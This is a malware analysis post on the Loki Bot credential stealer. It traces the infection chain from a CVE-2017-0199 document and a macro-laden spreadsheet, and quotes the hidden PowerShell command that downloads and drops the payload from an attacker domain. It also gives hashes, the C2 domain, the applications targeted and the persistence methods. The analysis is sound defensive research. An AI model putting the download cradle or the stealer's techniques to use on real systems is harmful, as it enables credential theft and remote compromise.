A few hours after the last ransomware attack with the "NotPetya" ransomware, some files were related to the attack as attack vector. Some antimalware companies and malware research comunities spoke about some domains and samples that have been related to this attack.
By that reason, I started to analyze the samples to get to the bottom of the matter. r your tranquillity, I must say that the samples are not related to “NotPetya" ransomware but they are related to an interesting malware which I am going to explain, dubbed “Loki Bot”.
Attack vector.
Loki Bot is a sensitive information stealer. Loki Bot can read private information from a large list of Windows programs and sends it to CnC.
You can buy this malware on internet with differents modules and features.
Like some malware researchers said, the attack vector starts with a .doc file. This file exploits a known vulnerability (CVE-2017-0199 – Info) for download other file from a server (84.200.16.242/myguy.xls).
The downloaded .xls file has an embedded macro that downloads a binary file from another server using PowerShell.
We can find the script opening the xls file with an Hex Editor
After extract the script and execute it, the script will try to download a .exe file from french-cooking[.]com domain.
PowerShell command:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.]com/myguy.]exe[', 'C:\Users\d00rt\AppData\Roaming\45298.exe');
Finally when myguy.exe is executed, it tries to connect with the CnC, coffeinoffice.xyz
Let's see what happens with myguy.exe ;)
Loki Bot Analysis.
MD5 | A1D5895F85751DFE67D19CCCB51B051A |
SHA1 | 9288FB8E96D419586FC8C595DD95353D48E8A060 |
UNPACKING
This sample is protected with a custom packer, but finally it uses the RunPE technique to unpack itself, at this moment we can dump it and start a comfortable analysis.
Unpacked MD5 | 49F3606755B12230BFF639361C7109A7 |
Unpacked SHA1 | 234A7174E67EEC394FAF5139BC79C69BF0EBFFB8 |
WINDOWS API
This sample is not easy to analyze, it has some techniques to make the analysis more difficult. For example, to perform a call to any function of Windows Api, it uses a special function. In order to make it works, the malware has to push three values, then the function will return a memory addres related to the function that it is looking for.
Main functionality
Loki Bot initializes WSASTartup, then it creates a Mutex with the same name that the machine GUID MD5.
import hashlib
mutex_name = hashlib.md5(machine_GUID).hexdigest()[:24]
Later Lokibot collects sensitive information from the supported modules and sends it to CnC.
After stealing data, it gains persistence on the system and finally it waits the CnC commands in a loop.
SENSITIVE DATA
Loki Bot supports a lot of different Windows applications to steal information. In the following table you can find all the modules that I could identify during the analysis.
Firefox | SoftwareNet | mSecure | Bitvise | 1Password |
IceDragon | FTPShell | vnc_files | WinFTP | Winbox |
Safari | NppFTP | BlazeFTP | MartinPrikryl | KDBX_files |
K_Meleon | MyFTP | FAStream_NetFile | FreshFTP | Enpass |
SeaMonkey | FTPBox | GoFTP | BitKinex | z_Mailing |
Flock | SherrodFTP | ESTSoft_FTP | UltraFXP | Opera_Mail |
Black_Hawk | FTPNow | DeluxeFTP | FTPNow2 | PostBox |
Lunascape | Nexus | TotalComander | VanDyke | FossaMail |
Comodo | XFTP | FTPGetter | OdinFTP | MailBox |
Opera | EasyFTP | WS_FTP | NCH_FLING | WinChips |
QtWeb | SFTP_NetDrive | FullTiltPoker | NCH_CLASSIC | Outlook |
QupZilla | AbleFTP | PokerStars | Kitty | YMail2 |
Vault | JaSFTP | ExpandDrive | ThunderBird | TrulyMail |
Cyberfox | Automize | Steed | FoxMail | spn_files |
Pale_Moon | Cyberduck | FlashFXP | PocoMail | TODODesktop |
WaterFox | FullSync | NovaFTP | IncrediMail | Stickies |
GoogleTark | FTPInfo | NetDrive | GmailNotifierPro | NoteFly |
SuperPutty | LinasFTP | TotalComander | dcf_files | Notezilla |
Syncovery | FileZilla | SmartFTP | 32BitFTP | StickyNotes |
FTPNavigato | StaffFTP | FarManager | RoboForm |
Loki Bot loads an array with different address and call them dynamically.
During my analysis, the malware got my gmail account data from Comodo/Dragon Browser and FileZilla config. (Look at stolen data, you can see passwords in plain text :O ).
Once the LokiBot has finished stealing data, it prepares a packet to send to CnC. The data is compressed by an algorithm.
The first data size was 0x2541 and now the size is 0xB27
The malware obtains the computer metadata to identify the stolen data with the computer where the stolen data was gotten. This metadata will be the header of the packet that will be send to CnC including some flags (data size, stolen data size per each module...) which I am not going to explain in depth in this post.
In the next image we see the final payload to send to CnC and the CnC domain:
HTTP-request (I patched the host to see the request because the real server is down). It uses "Mozilla/4.08 (Charon; Inferno)" as User-Agent.
Finally Loki Bot stay looping waiting commands from CnC, Loki Bot sends to the CnC a "clean" packet (Just with the metadata header we saw previously). If the CnC responses to the requests, Loki Bot Creates a thread for parsing the CnC answer.
I analyzed this part statically because the server is down, so some parts are not clear but I found different behaviours depending on the CnC response.
1. The CnC can asks to steal sensitive data again.
2. The CnC can requests to the compromised computer that download, execute and load files and libraries.
Basically Loki bot looks like it can do what it want. It could perform backdoor task, or update itself with new features.
PERSISTENCE
Loki bot copies and hides itself into the next folder “C:\Users\d00rt\AppData\Roaming\72431D”. The malware sets the folder and files attributes using SetFileAttributes with 0x2006 attributes.
0x2006 | Attribute |
---|---|
0x2 | FILE_ATTRIBUTE_HIDDEN |
0x4 | FILE_ATTRIBUTE_SYSTEM |
0x2000 | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED |
Author: @D00RT